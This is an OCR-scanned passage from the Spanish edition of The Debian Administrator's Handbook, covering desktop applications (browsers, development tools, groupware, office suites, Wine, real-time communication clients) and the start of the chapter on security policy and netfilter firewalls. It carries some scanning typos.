puestas  por  la  Mozilla  Foundation  en  la  marca  registrada  Firefox™:  cualquier  soft¬ 
ware  llamado  Firefox  debe  utilizar  el  logo  y  los  fconos  oficiales  de  Firefox.  Sin  embar¬ 
go,  debido  a  que  estos  elementos  no  son  publicados  bajo  una  licencia  libre,  Debian 
no  puede  distribuirlos  en  su  seccion  main.  En  lugar  de  mover  todo  el  navegador  a 
non-free,  el  encargado  del  paquete  decidio  utilizar  un  nombre  diferente. 

Todavia  existe  el  programa  firefox  en  el  paquete  iceweasel,  pero  solo  por  compa- 
tibilidad  con  las  herramientas  que  intenten  utilizarlo. 

Por  razones  similares,  se  cambio  el  nombre  del  cliente  de  correo  Thunderbird™  a 
Icedove  de  la  misma  forma. 


Por  ultimo,  si  bien  no  menos  importante,  Debian  tambien  contiene  el  navegador  web  Chromium 
(disponible  en  el  paquete  chromium-browser).  Google  desarrolla  este  navegador  a  un  ritmo  tan 
rapido  que  probablemente  no  sea  posible  mantener  solo  una  version  del  mismo  durante  todo 
el  ciclo  de  vida  de  Debian  Jessie.  Su  proposito  es  hacer  mas  atractivos  los  servicios  web,  tanto 
optimizando  el  rendimiento  del  navegador  como  aumentando  la  seguridad  del  usuario.  El  codi- 
go  libre  que  hace  funcionar  a  Chromium  tambien  es  utilizado  por  su  version  privativa  llamada 
Google  Chrome. 


13.6.  DesarroIIo 

13.6.1.  Herramientas  para  GTK+  en  GNOME 

Anjuta  (en  el  paquete  anjuta )  es  un  entorno  de  desarrollo  optimizado  para  crear  aplicacion  GTK+ 
para  GNOME.  Glade  (en  el  paquete  glade)  es  una  aplicacion  disenada  para  crear  interfaces  grafi- 
cas  GTK+  para  GNOME  y  guardarlas  en  una  archivo  XML.  La  biblioteca  compartida  libglade  puede 
cargar  estos  archivos  XMLy  recrear  dinamicamente  las  interfaces  guardadas;  esta  funcionalidad 
puede  ser  interesante,  por  ejemplo  para  los  plugins  que  necesitan  ventanas  interactivas. 

El  objetivo  de  Anjuta  es  combinar,  de  forma  modular,  todas  las  caracteristicas  que  uno  podria 
esperar  de  un  entorno  integrado  de  desarrollo. 


13.6.2.  Herramientas  para  Qt  en  KDE 

Las  aplicaciones  equivalentes  para  KDE  son  KDevelop  (en  el  paquete  kdevelop )  para  el  entorno 
de  desarrollo  y  Qt  Designer  (en  el  paquete  qttools5-dev-tools)  para  el  diseno  de  interfaces  graficas 
de  aplicaciones  Qt  en  KDE. 
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13.7  Trabajo  colaborativo 


13.7.1.  Trabajo  en  grupo:  groupware 

Las  herramientas  de  trabajo  en  grupo  («groupware»)  suelen  ser  bastante  complejas  de  mantener 
porque  concentran  varias  herramientas  y  tienen  requerimientos  que  no  siempre  son  faciles  de 
cumplir  en  el  contexto  de  una  distribution  integrada.  Existe,  por  lo  tanto,  una  larga  lista  de 
groupware  que  estuvo  disponible  en  Debian  en  algun  momento  pero  fueron  eliminadas  por  falta 
de  encargados  o  incompatibilidades  con  otro  software  (mas  reciente)  en  Debian.  Este  fue  el  caso 
de  PHPGroupware,  eGroupware  y  Kolab. 

http://www.phpgroupware.org/ 
http://www.egroupware.org/ 
http : //www. kolab. org/ 

Sin  embargo,  no  todo  esta  perdido.  Mucha  de  las  caracteristicas  clasicas  que  provee  el  softwa¬ 
re  «groupware»  estan  siendo  integradas  al  software  «estandar».  Esto  reduce  la  necesidad  de 
software  groupware  especifico  y  especializado.  Por  el  otro  lado,  esto  generalmente  necesita  un 
servidor  especifico.  Mas  interesantes  son  las  alternativas  Citadel  (en  el  paquete  citadel-suite )  y 
Sogo  (en  el  paquete  sogo )  disponibles  en  Debian  Jessie. 


13.7.2.  Trabajo  colaborativo  con  FusionForge 

FusionForge  es  una  herramienta  de  desarrollo  colaborativo  derivado  de  SourceForge,  un  servi- 
cio  de  almacenamiento  de  proyectos  de  software  libre.  Tiene  el  mismo  enfoque  general  basado 
en  el  modelo  estandar  de  desarrollo  de  software  libre.  El  software  en  si  continuo  evolucionan- 
do  luego  que  el  codigo  de  SourceForge  paso  a  ser  privativo.  Sus  autores  iniciales,  VA  Software, 
decidieron  no  publicar  mas  versiones  libres.  Lo  mismo  paso  cuando  su  primer  bifurcation  (GFor- 
ge)  siguio  el  mismo  camino.  Debido  a  que  muchas  personas  y  organizaciones  participaron  en  su 
desarrollo,  el  FusionForge  actual  tambien  incluye  funcionalidad  que  apuntan  a  un  enfoque  mas 
tradicional  de  desarrollo  asi  como  tambien  proyectos  que  no  estan  completamente  enfocados 
en  el  desarrollo  de  software. 

Se  puede  considerar  a  FusionForge  como  una  amalgama  de  varias  herramientas  dedicadas  a  ges- 
tionar,  seguir  y  coordinar  proyectos.  Podriamos  clasificar  estas  herramientas,  a  grandes  rasgos, 
en  tres  familias: 

■  comunicacion :  foros  web,  gestor  de  listas  de  correo,  sistemas  de  anuncios  que  permiten  que 
el  proyecto  publique  noticias; 

■  seguimiento:  gestor  de  tareas  para  controlar  el  progreso  y  programar  tareas,  seguimien- 
to  de  errores  (o  parches,  o  pedidos  de  funcionalidad,  o  cualquier  otro  tipo  de  reporte  — 
«ticket»),  encuestas; 

■  compartir :  gestor  de  documentation  para  proveer  un  unico  punto  central  para  documen- 
tos  relacionados  a  un  proyecto,  gestor  generico  de  publication  de  archivos,  sitio  web  de- 
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dicado  a  cada  proyecto. 

Debido  a  que,  en  gran  parte,  FusionForge  esta  dedicado  a  desarrollo  de  proyectos,  tambien  in- 
tegra  muchas  herramientas  como  CVS,  Subversion,  Git,  Bazaar,  Dares,  Mercurial  y  Arch  para 
gestion  de  control  de  fuente  o  «gestion  de  configuracion»  o  « control  de  versiones»  —  este  pro- 
ceso  tiene  muchos  nombres.  Estos  programas  mantienen  un  historial  de  todas  las  revisiones  de 
todos  los  archivos  seguidos  (generalmente  archivos  de  codigo  fuente),  con  todos  los  cambios 
que  atravesaron  y  pueden  integrar  modificaciones  cuando  varios  desarrolladores  trabajan  si- 
multaneamente  en  la  misma  porcion  de  un  proyecto. 

Muchas  de  estas  herramientas  estan  disponible,  o  inclusive  son  administradas,  en  una  interfaz 
web  con  un  sistema  de  permisos  muy  detallado  y  notificaciones  por  correo  de  algunos  eventos. 


13.8.  Suites  de  oficina 

Durante  mucho  tiempo  el  mundo  del  software  libre  era  limitado  en  cuanto  a  software  de  oficina. 
Los  usuarios  pedfan  reemplazos  de  las  herramientas  de  Microsoft  como  Word  y  Excel,  pero  es¬ 
tas  son  tan  complejas  que  el  desarrollo  de  dichos  reemplazos  fue  complejo.  La  situacion  cambio 
cuando  comenzo  el  proyecto  OpenOffice.org  (luego  de  que  Sun  publicara  el  codigo  de  StarOffice 
bajo  una  licencia  libre).  Actualmente,  Debian  incluye  Libre  Office,  una  bigurcacion  de  OpenOf- 
fice.org.  Los  proyectos  GNOME  y  KDE  continuan  trabajando  en  sus  ofertas  (GNOME  Office  y  Ca- 
lligra  Suite)  y  la  competencia  amigable  lleva  a  resultados  interesantes.  Por  ejemplo,  la  hoja  de 
calculo  Gnumeric  (parte  de  GNOME  Office)  es  inclusive  mejor  que  OpenOffice.org/Libre  Office 
en  algunos  aspectos,  notablemente  en  la  precision  de  sus  calculos.  En  cuanto  al  procesamiento 
de  texto,  las  suites  OpenOffice.org  y  Libre  Office  todavia  llevan  la  delantera. 

Otra  caracterfstica  importante  para  los  usuarios  es  la  capacidad  de  importar  documentos  Word 
y  Excel  que  encuentran  o  reciben  de  contactos.  Aun  cuando  todas  las  suites  de  oficina  poseen 
filtros  que  permiten  trabajar  con  estos  formatos,  solo  aquellos  en  OpenOffice.org  y  Libre  Office 
son  suficientemente  funcionales  para  usar  diariamente. 


UNA  VISION  MAS  AMPLIA  Los  colaboradores  de  OpenOffice.org  crearon  una  fundacion  ( The  Document  Foun- 
Libre  Office  reemplaza  dation)  para  abarcar  el  desarrollo  del  proyecto.  Se  discutio  la  idea  por  un  tiempo, 
OpenOffice  org  Pero  disparador  fue  la  adquisicion  de  Sun  por  parte  de  Oracle.  Los  nuevos  due- 
nos  hicieron  incierto  el  futuro  de  OpenOffice  bajo  la  mano  de  Oracle.  Debido  a  que 
Oracle  decidio  no  unirse  a  la  fundacion,  los  desarrolladores  debieron  abandonar  el 
nombre  OpenOffice.org.  Ahora  se  conoce  al  software  como  Libre  Office.  Luego  de 
un  periodo  de  relativo  estancamiento  en  el  campo  de  OpenOffice.org,  Oracle  deci¬ 
dio  migrar  el  codigo  y  los  derechos  asociados  a  la  «Apache  Software  Foundation* 
(fundacion  de  software  Apache),  y  ahora  OpenOffice  es  un  proyecto  de  Apache. 

Debian  solo  incluye  Libre  Office.  El  paquete  de  software  OpenOffice,  publicado  por 
la  Fundacion  de  Software  Apache  no  esta  actualmente  disponible  en  Debian. 


Libre  Office  y  el  paquete  Calligra  se  encuentran  disponibles,  respectivamente,  en  los  paquetes 
Debian  libreoffice  y  calligra.  No  hay  mas  paquetes  para  GNOME  Office  (era  gnome-office).  Los  pa¬ 
quetes  especificos  de  idioma  para  Libre  Office  se  distribyen  en  paquetes  separados:  los  mas  im- 
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portantes  son  libreoffice-llOn-*  y  libreoffice-help-*;  algunas  funcionalidades,  como  los  diccionarios 
de  ortografia,  patrones  para  separado  en  sflabas  y  thesaurus  se  encuentran  en  paquetes  tales  co¬ 
mo  myspell-* /hunspell-*),  hyphen-*  y  my thes-*.  Tenga  en  cuenta  que  Calligra  Suite  solia  llamarse 
KOffice. 


13.9.  Emulacion  de  Windows:  Wine 

A  pesar  de  todos  los  esfuerzos  mencionados  anteriormente,  existen  todavia  herramientas  sin 
equivalente  en  Linux,  o  para  las  que  las  versiones  originales  son  absolutamente  necesarias.  Aqui 
es  donde  son  utiles  los  sistemas  de  emulacion  de  Windows.  El  mas  conocido  entre  ellos  es  Wine. 

https://www.winehq.org/ 


COMPLEMENTOS  CrossOver,  producido  por  CodeWeavers,  es  un  conjunto  de  mejoras  a  Wine  que 
CrossOver  Linux  amplian  el  conjunto  de  funcionalidades  de  emulacion  al  punto  que  se  puede  utili- 
zar  completamente  Microsoft  Office.  Algunas  de  estas  mejoras  son  incorporadas 
periodicamente  en  Wine. 

>►  http : //www. codeweavers . com/ products/ 


Sin  embargo,  uno  debe  tener  en  cuenta  que  solo  es  una  solucion  entre  muchas  otras  y  que  tam- 
bien  puede  enfrentar  el  problema  con  una  maquina  virtual  o  VNC,  ambas  soluciones  son  detalla- 
das  en  los  recuadros  «Maquinas  virtuales»  pagina  392  y  «Windows  Terminal  Server  o  VNC»  pagina 
392. 

Comencemos  con  un  recordatorio:  la  emulacion  permite  ejecutar  un  programa  (desarrollado 
para  un  sistema  objetivo)  en  un  sistema  anfitrion  diferente.  El  software  de  emulacion  utiliza  el 
sistema  anfitrion,  donde  ejecuta  la  aplicacion,  para  imitar  la  funcionalidad  requerida  del  sistema 
objetivo. 

Ahora  vamos  a  instalar  los  paquetes  requeridos  ( ttf-mscorefonts-installer  se  encuentra  en  la  sec- 
cion  de  contribuciones): 

#  apt-get  install  wine  ttf-mscorefonts-installer 

En  un  sistema  de  64  bits  (amd64),  si  sus  aplicaciones  Windows  son  de  32  bits,  entonces  tendra  que 
activar  ”multi-arch”  para  poder  instalar  wine32  de  arquitectura  i386  (vea  Seccion  5.4.5,  «Com- 
patibilidad  multiarquitectura»  pagina  100  ). 

El  usuario  necesita  ejecutar  winecfg  y  configurar  que  ubicaciones  (Debian)  estaran  asociadas 
a  que  dispositivos  (Windows),  winecfg  tiene  algunos  valores  predeterminados  sensatos  y  pue¬ 
de  autodetectar  algunos  dispositivos  adicionales.  Tenga  en  cuenta  que  si  posee  un  sistema  de 
arranque  dual  no  deberia  apuntar  el  disco  C:  donde  esta  montada  la  particion  Windows  en  De¬ 
bian  ya  que  es  probable  que  Wine  sobreescriba  algunos  datos  de  esta  particion,  haciendo  que 
Windows  no  sea  utilizable.  Puede  mantener  otras  configuraciones  en  sus  valores  predetermina¬ 
dos.  Para  ejecutar  programas  Windows  primero  necesitara  instalarlos  ejecutando  su  instalador 
(de  Windows)  bajo  Wine,  ejecutando  algo  como  wine  .  .  . /setup,  exe;  una  vez  que  el  programa 
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esta  instalado,  puede  ejecutarlo  con  wine  .  .  ,/programa.exe.  La  ubicacion  exacta  del  archi- 
vo  p  rog  rama .  exe  depende  de  a  donde  esta  asociado  el  disco  C:;  sin  embargo,  en  muchos  casos, 
ejecutar  simplemente  wine  prog  rama  funcionaraya  que  generalmente  se  lo  instala  en  una  ubi¬ 
cacion  donde  Wine  podra  encontrarlo  por  su  cuenta. 


CONSEJO 

Trabajando  con  un  error 
winecfg 


En  algunas  ocasiones,  winecfg  (que  solo  es  un  envoltorio)  puede  fallar.  Para 
resolverlo,  es  posible  tratar  de  ejecutar  el  comando  subyacente  manualmente: 
wine64  /us r/lib/x86_64- Linux -gnu/wine/wine/winecfg . exe .  so  owine32  / 
us  r/lib/i386-linux-gnu/wine/wine/winecfg . exe .so. 


Sepa  que  no  debe  depender  de  Wine  (o  soluciones  similares)  sin  probar  realmente  el  software 
particular:  solo  una  prueba  de  uso  real  determinara  sin  dudas  si  la  emulacion  es  completamente 
funcional. 


ALTERNATIVA  Una  alternativa  para  emular  el  sistema  operativo  de  Microsoft  es  ejecutarlo  real- 
Maquinas  virtuales  rnente  en  una  maquina  virtual  que  emula  el  hardware  completo  de  un  equipo.  Esto 
permite  ejecutar  cualquier  sistema  operativo.  El  Capitulo  12:  «Administracion  avan- 
zada»  pagina  322  describe  varios  sistemas  de  virtualizacion,  mas  notablemente  Xen 
y  KVM  (pero  tambien  QEMU,  VMWare  y  Bochs). 


ALTERNATIVA  Otra  posibilidad  es  ejecutar  remotamente  las  aplicaciones  Windows  en  un  servidor 
Windows  Terminal  Server  o  central  con  Windows  Terminal  Server  y  acceder  a  la  aplicacion  desde  maquinas 
VNC  Linux  utilizando  rdesktop.  Este  es  un  cliente  Linux  para  el  protocolo  RDP  ( proto - 
colo  de  escritorio  remoto :  «Remote  Desktop  Protocols)  que  Windows  NT/2000 
Terminal  Server  utiliza  para  mostrar  escritorios  en  maquinas  remotas. 

El  software  VNC  provee  funcionalidades  similares,  con  el  beneficio  adicional  de 
que  tambien  funciona  con  muchos  sistemas  operativos.  Describimos  los  clientes  y 
servidores  VNC  Linux  en  la  Seccion  9.2,  « I n i c i o  de  sesion  remoto»  pagina  203. 


13.10  Software  de  comunicaciones  en  tiempo  real 

Debian  proporciona  un  amplo  rango  de  sofware  cliente  de  comunicaciones  en  tiempo  real  (RTC). 
La  configuracion  de  servidores  RTC  se  cubre  en  Seccion  11.8,  «Servicios  de  comunicacion  en 
tiempo  real»  pagina  311.  En  terminologia  SIP,  tambien  se  denomina  como  agente  de  usuario  a 
una  aplicacion  cliente  o  dispositivo. 

Cada  aplicacion  de  cliente  varia  en  funcionalidad.  Alunas  aplicaciones  son  mas  convenientes 
para  usuarios  intensivos  de  chat,  mientras  que  otras  aplicaciones  son  mas  estables  para  usuarios 
de  camaras  web.  Puede  ser  necesario  probar  varias  aplicaciones  para  identificar  cual  de  ellas 
es  la  adecuada.  Un  usuario  puede  decidir  finalmente  que  necesita  mas  de  una  aplicacion,  por 
ejemplo,  una  aplicacion  XMPP  para  mensajeria  con  clientes  y  una  aplicacion  IRC  para  colaborar 
con  algunas  comunidades  en  linea. 

Para  maximizar  la  posibilidad  de  los  usuarios  a  comunicarse  con  gran  parte  de  mundo,  se  reco- 
mienda  configurar  clientes  SIP  y  XMPP,  o  un  solo  cliente  que  soporte  ambos  protocolos. 
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El  escritorio  por  defecto  de  GNOME  incluye  el  cliente  de  comunicaciones  Empathy.  Empathy 
puede  soportar  SIP  y  XMPP.  Soporta  mensajerfa  instantanea  (IM),  voz  y  video.  El  escritorio  KDE 
proporciona  Telepathy,  un  cliente  de  comunicaciones  basado  en  la  misma  API  que  Telepathy  , 
empleado  en  el  cliente  Empathy  de  GNOME. 

Las  alternativas  populares  a  Empathy/Telepathy  incluyen  Ekiga,  Jitsi,  Linphone,  Psi  y  Ring  (an- 
teriormente  conocido  como  SFLphone). 

Algunas  de  estas  aplicaciones  tambien  pueden  interactuar  con  usuarios  moviles,  usando  aplica- 
ciones  como  Lumicall  en  Android. 

http : //lumicall . org 

La  Gma  rapida  de  inicio  a  comunicaciones  en  tiempo  real  tiene  un  capitulo  dedicado  al  software  clien¬ 
te. 

http ://rt cquickst art . org/guide/multi/useragents . html 


CONSEJO  Alguno  clientes  RTC  tienen  problema  significativos  enviando  voz  y  video  a  traves  de 
Busque  clientes  que  firewalls  y  redes  NAT.  Los  usuarios  pueden  recibir  llamadas  fantasma  (su  telefono 

soporten  ICE  y  TURN  suena,  pero  no  oyen  a  la  otra  persona)  o  no  pueden  realizar  llamadas. 

Los  protocolos  ICE  y  TURN  se  desarrollaron  para  resolver  este  tipo  de  problemas. 
Trabajar  con  un  servidor  TURN  con  direcciones  IP  publicas  en  cada  punto,  y  usando 
clientes  software  que  soporten  ICE  y  TURN  proporciona  la  mejor  experiencia  de 
usuario. 

Si  el  software  de  cliente  solo  se  necesita  para  mensajeria  instantanea,  no  hay  nece- 
sidad  de  contar  con  soporte  ICE  o  TURN. 


Los  desarrolladores  de  Debian  operan  un  servicio  SIP  de  la  comunidad  en  rtc.debian.org1.  La 
comunidad  mantiene  un  wiki  con  la  documentacion  sobre  la  configuracion  de  la  mayorfa  de  las 
aplicaciones  cliente  empaquetadas  en  Debian.  Los  articulos  de  la  wiki,  y  las  capturas  de  pantalla 
son  una  buena  fuente  de  informacion  para  cualquiera  que  desee  configurar  un  servicio  similar 
en  su  propio  dominio. 

https : //wiki .debian . org/ Unit iedCommunications/DebianDevelopers/UserGuide 


^ttps :  //  rtc .  debian.  org 
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ALTERNATIVA 

IRC:  «Internet  Relay 
Chat» 


VISTA  RAPIDA 

Conferencias  de  video 
con  Ekiga 


Tambien  podemos  considerar  IRC,  ademas  de  SIP  y  XMPP.  IRC  esta  mas  orientado 
al  concepto  de  canales,  cuyos  nombres  comienzan  con  un  simbolo  de  numeral  #. 
Frecuentemente,  cada  canal  esta  dedicado  a  un  tema  especifico  y  cualquier  canti- 
dad  de  personas  pueden  unirse  a  un  canal  para  discutirlo  (pero  los  usuarios  tambien 
pueden  tener  conversaciones  privadas  solo  entre  dos  si  es  necesario).  El  protocolo 
IRC  es  mas  antiguo  y  no  permite  cifrado  punta-a-punta  de  los  mensajes;  si  es  po- 
sible  cifrar  la  comunicacion  entre  los  usuarios  y  el  servidor  utilizando  un  tunel  SSL 
para  el  trafico  del  protocolo  IRC. 

Los  clientes  IRC  son  un  poco  mas  complejos  y  generalmente  proveen  muchas  fun- 
cionalidades  con  un  uso  limitado  en  un  entorno  corporativo.  Por  ejemplo,  los  «ope- 
radores»  de  los  canales  son  usuarios  con  capacidad  de  echar  otros  usuarios  de  un 
canal  o  inclusive  bloquearlos  permanentemente  cuando  interrumpan  la  discusion 
normal. 

Debido  a  que  el  protocolo  IRC  es  muy  antiguo,  hay  disponibles  muchos  clientes 
que  se  adaptan  a  muchos  grupos  de  usuario;  los  ejemplos  incluyen  XChat  y  Smuxi 
(clientes  graficos  basados  en  GTK+),  Irssi  (modo  texto),  Ere  (integrado  a  Emacs), 
etc. 


Ekiga  (anteriormente  GnomeMeeting)  es  una  aplicacion  destacada  para  conferen¬ 
cias  de  video  en  Linux.  Es  estable,  funcional  y  muy  sencilla  de  utilizar  en  una  red 
local;  configurar  el  servicio  en  una  red  global  es  mucho  mas  complejo  cuando  los 
firewalls  involucrados  no  son  compatibles  explicitamente  con  los  protocolos  de  te- 
leconferencias  H323  y/o  SIP  y  todas  sus  peculiaridades. 

Si  solo  se  ejecutara  un  cliente  Ekiga  detras  del  firewall,  la  configuracion  es  bastante 
directa  ya  que  solo  involucra  redirigir  unos  pocos  puertos  al  equipo  dedicado:  el 
puerto  TCP  1720  (que  espera  conexiones  entrantes),  el  puerto  TCP  5060  (para  SIP), 
los  puertos  TCP  30000  a  30010  (para  control  de  conexiones  abiertas)  y  los  puertos 
UDP  5000  a  5100  (para  transmision  de  datos  de  audio  y  video  asi  como  registracion 
con  un  proxy  H323). 

Cuando  se  ejecuten  varios  clientes  Ekiga  detras  del  firewall,  la  complejidad  aumen- 
ta  considerablemente.  Debera  configurar  un  proxy  H323  (por  ejemplo  el  paquete 
gnugk),  tarea  que  dista  de  ser  sencilla. 
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Un  sistema  de  information  puede  tener  un  nivel  variable  de  importancia  dependiendo  del  entomo.  En 
algunos  casos  es  vital  para  la  supervivencia  de  una  empresa.  Por  lo  tanto,  debe  ser  protegido  de  los 
diversos  tipos  de  riesgos.  El  proceso  de  evaluation  de  estos  riesgosy  la  definition  e  implementation  de  la 
protection  se  conocen  en  su  conjunto  como  «proceso  de  seguridad». 


14.1  Definition  de  una  politica  de  seguridad 


PRECAUCION  La  seguridad  es  un  tema  muy  amplio  y  muy  sensible  por  lo  que  no  podemos  preten- 
Alcance  de  este  capitulo  der  describirlo  de  cualquier  forma  exhaustiva  en  el  curso  de  un  solo  capitulo.  Solo 

delinearemos  algunos  puntos  importantes  y  describiremos  algunas  de  las  herra- 
mientas  y  metodos  que  pueden  ser  de  utilidad  en  el  ambito  de  la  seguridad.  Para 
leer  mas,  la  literatura  abunda  y  libros  enteros  se  han  dedicado  al  tema.  Un  excelen- 
te  punto  de  partida  seri'a  Linux  Server  Security  por  Michael  D.  Bauer  (publicado 
por  O’Reilly). 


La  palabra  «seguridad»  en  si  misma  cubre  un  amplio  rango  de  conceptos,  herramientas  y  proce- 
dimientos,  ninguno  de  los  cuales  es  universal.  Seleccionar  entre  ellos  requiere  una  idea  precisa 
de  sus  metas.  Asegurar  un  sistema  comienza  con  responder  unas  pocas  preguntas.  Al  precipi- 
tarse  a  implementar  un  conjunto  arbitrario  de  herramientas  corre  el  riesgo  de  enfocarse  en  los 
aspectos  de  seguridad  equivocados. 

Lo  primero  a  determinar,  por  lo  tanto,  es  el  objetivo.  Un  buen  metodo  para  ayudar  con  esta 
determinacion  comienza  con  las  siguientes  preguntas: 

■  iQue  estamos  tratando  de  proteger?  La  politica  de  seguridad  sera  diferente  dependiendo 
de  si  queremos  proteger  los  equipos  o  los  datos.  En  este  ultimo  caso,  tambien  es  necesario 
saber  que  datos. 

■  i Contra  que  estamos  tratando  de  protegernos?  ^Fuga  de  datos  confidenciales?  ^Perdida 
accidental  de  datos?  ^Perdida  de  ingresos  por  interrupcion  del  servicio? 

■  Tambien  ^contra  quien  estamos  tratando  de  protegernos?  Las  medidas  de  seguridad  seran 
diferentes  para  protegerse  contra  el  error  de  un  usuario  regular  del  sistema  de  lo  que 
serian  contra  un  grupo  de  atacantes  determinado. 

Habitualmente,  se  utiliza  el  termino  «riesgo»  para  referirse  al  conjunto  de  estos  tres  factores: 
que  proteger,  que  necesitamos  prevenir  antes  que  suceda  y  quien  intentara  hacer  que  suceda. 
Modelar  el  riesgo  requiere  respuestas  a  estas  tres  preguntas.  A  partir  de  este  modelo  de  riesgo, 
podemos  construir  una  normativa  de  seguridad  e  implementarla  con  acciones  concretas. 


NOTA  Bruce  Schneier,  un  experto  mundial  en  asuntos  de  seguridad  (no  solo  seguridad 
Preguntas  permanentes  informatica)  intenta  contrarrestar  uno  de  los  mitos  mas  importantes  con  la  frase: 

«la  seguridad  es  un  proceso,  no  un  producto».  Los  activos  a  proteger  cambian  con 
el  tiempo,  asi  como  tambien  lo  hacen  las  amenazas  y  los  medios  a  disposicion  de 
los  potenciales  atacantes.  Incluso  si  inicialmente  se  diseno  e  implemento  perfecta- 
mente  una  normativa  de  seguridad,  uno  nunca  debe  dormirse  en  los  laureles.  Los 
componentes  del  riesgo  evolucionan  y  la  respuesta  a  dicho  riesgo  debe  evolucionar 
acordemente. 


Vale  la  pena  el  tomar  en  cuenta  restricciones  adicionales,  dado  que  pueden  limitar  el  alcance 
de  las  politicas  disponibles.  ^Hasta  donde  estamos  dispuestos  a  llegar  para  asegurar  un  sistema? 
Esta  pregunta  tiene  un  gran  impacto  en  la  politica  a  implementar.  La  respuesta  es  a  menudo 


398 


El  manual  del  Administrador  de  Debian 


definida  en  terminos  de  costos  monetarios,  pero  debe  considerar  otros  elementos,  tal  como  la 
cantidad  de  inconvenientes  impuestos  a  los  usuarios  del  sistema  o  una  degradation  en  el  rendi- 
miento. 

Una  vez  que  modelamos  el  riesgo,  podemos  comenzar  a  pensar  en  disenar  una  polftica  de  segu- 
ridad  real. 


NOTA  Hay  casos  donde  la  eleccion  de  las  acciones  necesarias  para  proteger  un  sistema  es 
Politicas  extremas  extremadamente  simple. 

Por  ejemplo,  si  el  sistema  a  proteger  esta  compuesto  solo  por  un  equipo  de  segunda 
mano,  el  cual  tiene  como  unico  uso  el  sumar  unos  cuantos  numeros  al  final  del  dia, 
la  decision  de  no  hacer  nada  especial  para  protegerlo  serfa  bastante  razonable.  El 
valor  intrinseco  del  sistema  es  bajo.  El  valor  de  los  datos  es  cero  ya  que  no  estan 
almacenados  en  el  equipo.  Un  atacante  potencial  que  se  infiltre  en  este  «sistema» 
solo  ganaria  una  calculadora  dificil  de  manejar.  El  costo  de  asegurar  tal  sistema 
probablemente  sea  mayor  que  el  costo  de  una  violacion. 

En  el  otro  extremo  del  espectro,  quizas  lo  que  se  quiere  proteger  es  la  confidenciali- 
dad  de  los  datos  secretos  de  la  manera  mas  completa  posible,  superando  cualquier 
otra  consideracion.  En  este  caso,  una  respuesta  apropiada  seria  la  destruccion  total 
de  estos  datos  (borrar  de  forma  segura  los  archivos,  triturar  en  pedacitos  los  discos 
duros  y  luego  disolverlos  en  acido,  y  asf  sucesivamente).  Si  hay  un  requisito  adicio- 
nal  de  que  los  datos  sean  guardados  para  un  uso  futuro  (aunque  no  necesariamente 
disponibles  con  facilidad),  y  si  el  costo  aun  no  es  un  factor,  entonces  un  punto  de 
partida  podrfa  ser  almacenar  los  datos  en  placas  de  aleacion  de  platino— iridio  al¬ 
macenados  en  bunkeres  a  prueba  de  bombas  en  varias  montanas  del  mundo,  cada 
uno  de  los  cuales  es  (por  supuesto)  totalmente  secreto  y  protegido  por  ejercitos 
enteros... 

Estos  ejemplos  podran  parecer  extremos,  sin  embargo,  serfan  una  respuesta  adecua- 
da  a  los  riesgos  definidos,  en  la  medida  en  que  son  el  resultado  de  un  proceso  de 
pensamiento  que  tiene  en  cuenta  los  objetivos  a  alcanzar  con  las  limitaciones  que 
deben  cumplirse.  Cuando  provienene  de  una  decision  razonada,  ninguna  politica 
de  seguridad  es  menos  respetable  que  cualquier  otra. 


En  la  mayorfa  de  los  casos,  el  sistema  de  informacion  puede  ser  segmentado  en  subconjuntos 
coherentes  y  en  su  mayorfa  independientes.  Cada  subsistema  tendra  sus  propios  requisites  y  li¬ 
mitaciones,  por  lo  que  se  debera  llevar  a  cabo  la  evaluacion  de  riesgos  y  el  diseno  de  la  polftica  de 
seguridad  por  separado  para  cada  uno.  Un  buen  principio  a  tener  en  cuenta  es  que  un  perfmetro 
corto  y  bien  definido  es  mas  facil  de  defender  que  una  frontera  larga  y  sinuosa.  Se  debe  disenar 
en  consecuencia  tambien  la  organizacion  de  la  red:  se  deben  concentrar  los  servicios  sensibles 
en  un  pequeno  ntimero  de  maquinas  y  estas  maquinas  solo  deben  ser  accesibles  a  traves  de  un 
ntimero  mfnimo  de  puntos  de  control,  asegurar  estos  puntos  de  control  sera  mas  facil  que  ase¬ 
gurar  todas  la  maquinas  sensibles  contra  la  totalidad  del  mundo  exterior.  Es  en  este  punto  que 
se  hace  evidente  la  utilidad  del  filtrado  de  red  (incluyendo  los  firewalls).  Puede  implementar 
este  filtrado  con  hardware  dedicado,  pero  posiblemente  una  solucion  mas  simple  y  flexible  sea 
utilizar  un  firewall  en  software  como  el  que  se  integra  en  el  nucleo  Linux. 
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14.2  Firewall  o  el  filtrado  de  paquetes 


VOLVER  A  LOS  CIMIENTOS  Un  firewall  es  una  pieza  de  equipo  de  computo  con  hardware  y/o  software  que 
Firewall  ordena  los  paquetes  entrantes  o  salientes  de  la  red  (que  vienen  hacia  o  desde  una 
red  local)  y  solo  permite  el  paso  de  aquellos  que  coinciden  con  ciertas  condiciones 
predefinidas. 


Un  firewall  es  una  puerta  de  enlace  de  la  red  con  filtro  y  solo  es  eficaz  en  aquellos  paquetes  que 
deben  pasar  a  traves  de  ella.  Por  lo  tanto,  solo  puede  ser  eficaz  cuando  la  unica  ruta  para  estos 
paquetes  es  a  traves  del  firewall. 

La  falta  de  una  configuracion  estandar  (y  el  lema  «proceso,  no  producto»)  explica  la  falta  de 
una  solution  preconfigurada.  Hay,  sin  embargo,  herramientas  que  facilitan  la  configuracion  del 
firewall  netfilter,  con  una  representation  grafica  de  las  reglas  de  filtrado.  fwbuilder  es  sin  duda 
uno  de  los  mejores  de  ellos. 


CASO  ESPEClFICO  Puede  restringir  un  firewall  a  una  maquina  en  particular  (a  diferencia  de  una  red 
Firewall  local  completa),  en  cuyo  caso  su  funcion  es  filtrar  o  limitar  el  acceso  a  algunos  servicios, 
o  posiblemente  evitar  las  conexiones  de  salida  de  software  ilegitimo  que  un  usuario 
podria,  voluntariamente  o  no,  haber  instalado. 


El  nucleo  Linux  incorpora  el  firewall  netfilter.  Puede  controlarlo  desde  el  espacio  de  usuario  con 
los  programas  iptables  e  ip6tables.La  diferencia  entre  estos  dos  programas  es  que  el  primero 
actua  sobre  la  red  IPv4,  mientras  que  el  segundo  actua  sobre  IPv6.  Debido  a  que  ambas  pilas 
de  protocolos  de  red  probablemente  continuaran  con  nosotors  durante  muchos  anos,  ambas 
herramientas  son  necesarias  y  deberan  ser  utilizadas  en  paralelo. 


14.2.1.  Comportamiento  de  netfilter 

netfilter  utiliza  cuatro  tablas  distintas  que  almacenan  las  reglas  que  regulan  tres  tipos  de  opera- 
ciones  sobre  los  paquetes: 

